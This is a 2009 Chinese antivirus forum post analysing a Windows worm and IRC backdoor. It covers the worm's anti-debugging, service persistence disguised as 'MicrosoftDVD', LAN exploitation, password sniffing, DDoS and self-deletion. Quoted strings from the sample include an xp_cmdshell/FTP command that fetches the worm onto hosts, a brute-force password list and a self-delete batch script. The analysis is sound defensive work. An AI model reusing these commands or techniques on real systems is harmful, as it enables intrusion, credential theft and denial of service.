pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析
该样本程序被执行后,动态获取所需的API,并调试环境检测,一旦检测到调试自杀后退出,没检测到继续,经过解密字符串后,检查自身是否已经运行,如果已经运行,则退出,否则拷贝自身到%SystemRoot%目录,然后设置文件时间与explorer.exe相同,并设置文件属性为系统加隐藏加只读,并设置派发服务函数,修改注册表与安装服务,成功后退出。
具体行为分析:
1.反调试手段:
(1) 利用"IsDebuggerPresent"检测调试器
(2) 利用GetTickout检查时间差检测是否被调试
(3) 通过检查注册表检测是否在虚拟机里运行:
ASCII "SOFTWARE\VMware, Inc.\VMware Tools"
(4) 通过检查设备对象\\.\NTICE检测SoftICE
2. 是否已经运行检测:
通过检测自身路径判断是否第一次运行:
如果在%SystemRoot%,表示已经运行,直接退出,否则拷贝自身到此目录,名称为“msdvd.exe”。
3. 注册表操作:
注册表操作函数通过判断最后一个参数的值有不同的操作:
最后一个参数为1时,添加键值:
| Quote: | hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions"
Value = “C:\Documents and Settings\Administrator\桌面\ msdvd.exe” |
|
4.创建服务:
| Quote: | ServiceName = "MicrosoftDVD"
DisplayName = "microsoftdvdhelp"
|StartType = SERVICE_AUTO_START
|BinaryPathName = """C:\WINDOWS\msdvd.exe""" |
|
5.派发服务函数主要功能:
是负责开线程,主要功能在线程函数里实现,功能如下:
(1) 设置%SystemRoot%\msdvd.exe 属性为正常,然后删除文件,连续删除3次
(2) 开启一个线程监控注册表,每600ms检测一次,发现被修改就改回来
| Quote: | SubKey = SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Key = Shell |
|
(3) 新开启一个线程枚举网络共享
| Quote: | 'd$\windows\system32',0 ;
'd$\winnt\system32',0 ;
'Admin$\system32',0 ;
'Admin$',0 |
|
(4) 释放名为rdriv.sys的驱动,并创建服务加载驱动,驱动用于保护病毒进程不被结束
(5) 通过设置注册表删除服务
| Quote: | Subkey = SYSTEM\\CurrentControlSet\\Control\
ValueName = WaitToKillServiceTimeout
Value = 7000 |
|
(6) 开端口等待病毒作者连接,这个后门除了支持一般的文件,注册表操作外,还提供了IRC后门功能,支持代理跳板扫描,各种DDOS,更新服务端等很多自定义命令。
(7) 扫描局域网,利用lsass, FTPD, MsSqlServer的各种已知漏洞溢出局域网其他主机,溢出成功后,上传自身并安装后门,还尝试暴力破解Sql server的密码
| Quote: | echo quit >> o &ftp -n -s : o &del /F /Q o &%s
EXEC master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us
User is running mIRC %s, connected to %s (%s:%s) using the nic
' Admin ',0 ;
' Root ',0 ;
' Server',0 ;
' Asdf',0 ;
'administrator',0
'!@#$%^&',0 ;
'!@#$%^',0 ;
'!@#$%',0 ;
'!@#$',0 ;
'654321',0 ;
'123456',0 ;
'12345',0 ;
'1234',0 ;
'123',0 ;
'12',0 ;
'111',0 ;
'1',0 ; |
|
(8) 带有sniffer功能:嗅探各种密码
| Quote: | FTP sniff "%s:%d" to "%s:%d": - "%s"',0Ah,0
'IRC sniff "%s:%d" to "%s:%d": - "%s"',0
'Bot sniff "%s:%d" to "%s:%d": - "%s"
POP3 Password2',0
'POP3 Server',0
'POP3 User Name',0
'HTTPMail Password2',0
'Hotmail',0 |
|
(9) 从注册表读区浏览器保存的密码:
| Quote: | Software\Microsoft\Internet Account Manager\Accounts
IE Auto-Complete:
IE Password Protected: |
|
(10) 带有Ddos功能:
| Quote: | 'ackflood',0
'icmpflood',0
'phatwonk',0
'synflood',0
'udpflood' |
|
(11) 自删除:
| Quote: | '@echo off',0Dh,0Ah ;
':Repeat',0Dh,0Ah
'del "%s">nul',0Dh,0Ah
'if exist "%s" goto Repeat',0Dh,0Ah
'del "%%0"' |
|
[ Last edited by pioneer on 2009-2-3 at 14:17 ]
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
